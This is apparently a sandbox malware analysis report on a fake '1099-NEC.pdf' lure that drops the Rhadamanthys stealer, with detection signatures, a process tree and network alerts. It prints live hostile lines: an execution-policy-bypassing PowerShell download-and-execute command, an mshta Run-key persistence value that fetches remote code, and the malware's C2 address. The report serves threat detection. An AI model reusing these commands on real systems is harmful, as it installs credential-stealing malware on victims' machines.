Edit tour

Windows Analysis Report
1099-NEC.pdf

Overview

General Information

Sample name:	1099-NEC.pdf
Analysis ID:	1640809
MD5:	b77cf9ae7bea425d8a5d42eacee9d226
SHA1:	ee9c30b16aee8039e681b26c5d6297be6497c723
SHA256:	1b1a8d3ff270bb9a5b3f1aa59453c3f7d509eaa65e4df517493d236b7acdb903
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected RHADAMANTHYS Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code references suspicious native API functions

AI detected suspicious Javascript

Blob-based file download detected

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Downloads suspicious files via Chrome

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to detect virtual machines (STR)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PDF has an OpenAction (likely to launch a dropper script)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Electron Application Child Processes

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64_ra

Acrobat.exe (PID: 6980 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\1099-NEC.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 6184 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 6484 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1592 --field-trial-handle=1556,i,12716373814358718302,18053842497517291753,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

chrome.exe (PID: 7296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tax1099.netlify.app/#1099-NEC.pdf MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,6931622229401212323,17754570736813438004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

wscript.exe (PID: 5000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 396 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

fontdrvhost.exe (PID: 7668 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

RegSvcs.exe (PID: 1648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

fontdrvhost.exe (PID: 2476 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

fontdrvhost.exe (PID: 6128 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

WerFault.exe (PID: 4792 cmdline: C:\Windows\system32\WerFault.exe -u -p 6128 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

RegSvcs.exe (PID: 512 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 1504 cmdline: dw20.exe -x -s 936 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

RegSvcs.exe (PID: 408 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

RegSvcs.exe (PID: 1224 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)

dw20.exe (PID: 1448 cmdline: dw20.exe -x -s 920 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 1592 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 1752 cmdline: dw20.exe -x -s 792 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

MSBuild.exe (PID: 8560 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

MSBuild.exe (PID: 8600 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)

dw20.exe (PID: 1636 cmdline: dw20.exe -x -s 764 MD5: 89106D4D0BA99F770EAFE946EA81BB65)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000013.00000002.1799759215.0000000005590000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000014.00000002.1790017213.0000000005520000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000013.00000002.1778830242.0000000003323000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000013.00000002.1801955151.0000000005883000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000013.00000002.1778830242.0000000003183000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000014.00000002.1790344128.00000000056E3000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000020.00000002.1776870135.00000000035B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000014.00000002.1778389744.0000000002F01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 396	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 1648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: fontdrvhost.exe PID: 2476	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
33.3.fontdrvhost.exe.4cd0000.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5000, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 7728, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tax1099.netlify.app/#1099-NEC.pdf, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 7296, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , ProcessId: 5000, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5000, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 7728, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta "javascript:var ffh = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], xao = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], gur = new ActiveXObject(ffh[0]); gur[ffh[1]](ffh[2], ffh[3], ffh[4], ffh[5], ffh[6]);close(); new ActiveXObject(xao[0])[xao[1]](WScript[xao[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Usecurekala74

Sigma detected: Suspicious Electron Application Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tax1099.netlify.app/#1099-NEC.pdf, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 7296, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , ProcessId: 5000, ProcessName: wscript.exe

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: mshta "javascript:var ffh = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], xao = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], gur = new ActiveXObject(ffh[0]); gur[ffh[1]](ffh[2], ffh[3], ffh[4], ffh[5], ffh[6]);close(); new ActiveXObject(xao[0])[xao[1]](WScript[xao[2]]);", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Usecurekala74

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tax1099.netlify.app/#1099-NEC.pdf, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 7296, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , ProcessId: 5000, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5000, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;, ProcessId: 7728, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T18:53:08.652351+0100	2047905	1	A Network Trojan was detected	192.168.2.16	49761	142.250.185.225	443	TCP

ETPRO EXPLOIT_KIT Possible Evil Redirect Leading to EK Dec 04 2016

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T18:52:52.481056+0100	2823606	1	Exploit Kit Activity Detected	45.223.19.158	443	192.168.2.16	49743	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T18:53:08.652351+0100	2803274	2	Potentially Bad Traffic	192.168.2.16	49761	142.250.185.225	443	TCP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T18:53:36.664655+0100	2854802	1	Domain Observed Used for C2 Detected	185.208.159.170	2484	192.168.2.16	49771	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-17T18:53:07.534075+0100	1810000	2	Potentially Bad Traffic	192.168.2.16	49760	142.250.185.225	443	TCP
2025-03-17T18:53:08.652351+0100	1810000	2	Potentially Bad Traffic	192.168.2.16	49761	142.250.185.225	443	TCP
2025-03-17T18:53:10.148330+0100	1810000	2	Potentially Bad Traffic	192.168.2.16	49762	185.166.143.48	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000014.00000002.1778389744.0000000002F01000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://185.208.159.170:2484/38d2415e410113/9do988c8.3o15p"}

Multi AV Scanner detection for submitted file

Source: 1099-NEC.pdf

ReversingLabs: Detection: 13%

Phishing

AI detected suspicious Javascript

Source: 0.3.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script that collects user data and potentially redirects to a fake login page. The overall behavior is highly suspicious and poses a significant security risk.
Source: 0.2.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The script appears to be engaging in malicious activities, such as redirecting to a suspicious domain and collecting user credentials. Given the combination of these behaviors, this script poses a high risk and should be treated with caution.
Source: 0.11.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The extensive use of encoded strings and multiple fallback domains, along with the script's overall suspicious nature, indicate a high likelihood of malicious intent. This script should be considered a significant security risk.
Source: 0.9.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of `eval`, `Function` constructor, and sending user data to unknown external domains are clear indicators of malicious intent. The overall level of obfuscation and lack of transparency make this script highly suspicious and potentially harmful.
Source: 0.4.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of heavily obfuscated code. The combination of these factors, along with the lack of transparency and the potential for malicious intent, indicates a high-risk scenario that requires immediate investigation and mitigation.
Source: 0.12.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk indicators, including dynamic code execution, data exfiltration, and heavily obfuscated code. The use of the `Function` constructor to execute remote or dynamic code is a clear sign of malicious intent. Additionally, the script appears to be sending sensitive data to an unknown domain, which poses a significant risk of data exfiltration. The heavy obfuscation of the code further suggests that the script is attempting to conceal its true purpose. Overall, this script demonstrates a high level of risk and should be treated with caution.
Source: 0.10.d.script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be a malicious phishing attempt, collecting user credentials and redirecting to a suspicious domain. The overall behavior is highly suspicious and poses a significant risk to users.
Source: 0.0..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://tax1099.netlify.app/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and heavy obfuscation. The use of the `Function` constructor to execute remote code, along with the presence of encoded strings and URLs, suggests a highly suspicious and potentially malicious script. Additionally, the script appears to be interacting with unknown or untrusted domains, further increasing the risk. Overall, this script demonstrates a clear intent to perform harmful actions and should be considered a high-risk threat.
Source: 0.16..script.csv	Joe Sandbox AI: Detected suspicious JavaScript with source url: https://tax1099.netlify.app/... The provided JavaScript snippet appears to be a highly suspicious and potentially malicious script. It exhibits several high-risk behaviors:1. Dynamic Code Execution: The script uses the `base64ZIP` variable, which likely contains encoded or obfuscated code that is executed at runtime, posing a significant risk.2. Data Exfiltration: The script may be sending sensitive user data to an external server, which is a clear indicator of malicious intent.3. Obfuscated Code/URLs: The script uses a heavily encoded string, suggesting an attempt to conceal its true purpose and functionality.Given the combination of these high-risk indicators, the script is assessed to have a high risk score of 9, indicating a high probability of malicious behavior. Further investigation and analysis would be necessary to determine the exact nature and purpose of this script.

Source: https://www.securefilepro.com/assets/sfp.html

HTTP Parser: No favicon

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Source: unknown	HTTPS traffic detected: 3.125.36.175:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.229:443 -> 192.168.2.16:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.31.249:443 -> 192.168.2.16:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.31.249:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.196:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.7:443 -> 192.168.2.16:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.245.46.46:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.223.19.158:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.16:49762 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2532186545.0000023AD044E000.00000004.00000020.00020000.00000000.sdmp
